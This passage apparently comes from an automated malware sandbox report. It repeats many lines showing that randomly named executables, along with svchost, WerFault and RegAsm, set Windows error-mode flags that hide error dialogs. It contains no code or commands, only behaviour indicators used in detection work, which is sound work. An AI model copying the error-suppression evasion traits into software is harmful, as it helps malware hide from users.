                        Source: C:\Users\user\Documents\iofolko5\1IvCzYfqoD3SHvKt45m1rbHu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\1IvCzYfqoD3SHvKt45m1rbHu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\1IvCzYfqoD3SHvKt45m1rbHu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\1IvCzYfqoD3SHvKt45m1rbHu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\1IvCzYfqoD3SHvKt45m1rbHu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\1IvCzYfqoD3SHvKt45m1rbHu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\1IvCzYfqoD3SHvKt45m1rbHu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\1IvCzYfqoD3SHvKt45m1rbHu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\1IvCzYfqoD3SHvKt45m1rbHu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\1IvCzYfqoD3SHvKt45m1rbHu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\1IvCzYfqoD3SHvKt45m1rbHu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\1IvCzYfqoD3SHvKt45m1rbHu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\1IvCzYfqoD3SHvKt45m1rbHu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\1IvCzYfqoD3SHvKt45m1rbHu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\1IvCzYfqoD3SHvKt45m1rbHu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\XO9lsdL5g6aUibu31TDcoBrI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\XO9lsdL5g6aUibu31TDcoBrI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\XO9lsdL5g6aUibu31TDcoBrI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\XO9lsdL5g6aUibu31TDcoBrI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\XO9lsdL5g6aUibu31TDcoBrI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\XO9lsdL5g6aUibu31TDcoBrI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\XO9lsdL5g6aUibu31TDcoBrI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\XO9lsdL5g6aUibu31TDcoBrI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\XO9lsdL5g6aUibu31TDcoBrI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\XO9lsdL5g6aUibu31TDcoBrI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\XO9lsdL5g6aUibu31TDcoBrI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\XO9lsdL5g6aUibu31TDcoBrI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\XO9lsdL5g6aUibu31TDcoBrI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\XO9lsdL5g6aUibu31TDcoBrI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\XO9lsdL5g6aUibu31TDcoBrI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\XO9lsdL5g6aUibu31TDcoBrI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\XO9lsdL5g6aUibu31TDcoBrI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\XO9lsdL5g6aUibu31TDcoBrI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\XO9lsdL5g6aUibu31TDcoBrI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\XO9lsdL5g6aUibu31TDcoBrI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\XO9lsdL5g6aUibu31TDcoBrI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\XO9lsdL5g6aUibu31TDcoBrI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\XO9lsdL5g6aUibu31TDcoBrI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\XO9lsdL5g6aUibu31TDcoBrI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\XO9lsdL5g6aUibu31TDcoBrI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\XO9lsdL5g6aUibu31TDcoBrI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\XO9lsdL5g6aUibu31TDcoBrI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\VkcBn13x2kmdo9AMRXP8qT_4.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\Users\user\Documents\iofolko5\hd4YBtMwCrxG4M3aLLza89vv.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Documents\iofolko5\hd4YBtMwCrxG4M3aLLza89vv.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Documents\iofolko5\hd4YBtMwCrxG4M3aLLza89vv.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Documents\iofolko5\hd4YBtMwCrxG4M3aLLza89vv.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Documents\iofolko5\hd4YBtMwCrxG4M3aLLza89vv.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Documents\iofolko5\hd4YBtMwCrxG4M3aLLza89vv.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Documents\iofolko5\hd4YBtMwCrxG4M3aLLza89vv.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Documents\iofolko5\hd4YBtMwCrxG4M3aLLza89vv.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Documents\iofolko5\hd4YBtMwCrxG4M3aLLza89vv.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Documents\iofolko5\hd4YBtMwCrxG4M3aLLza89vv.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Documents\iofolko5\hd4YBtMwCrxG4M3aLLza89vv.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Documents\iofolko5\hd4YBtMwCrxG4M3aLLza89vv.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Documents\iofolko5\hd4YBtMwCrxG4M3aLLza89vv.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Documents\iofolko5\hd4YBtMwCrxG4M3aLLza89vv.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Documents\iofolko5\hd4YBtMwCrxG4M3aLLza89vv.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Documents\iofolko5\hd4YBtMwCrxG4M3aLLza89vv.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Documents\iofolko5\hd4YBtMwCrxG4M3aLLza89vv.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Documents\iofolko5\hd4YBtMwCrxG4M3aLLza89vv.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Documents\iofolko5\hd4YBtMwCrxG4M3aLLza89vv.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Documents\iofolko5\hd4YBtMwCrxG4M3aLLza89vv.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Documents\iofolko5\hd4YBtMwCrxG4M3aLLza89vv.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Documents\iofolko5\iXbjjIcri3rG3XH6GK7dHSLO.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                        Source: C:\Users\user\Documents\iofolko5\XO9lsdL5g6aUibu31TDcoBrI.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
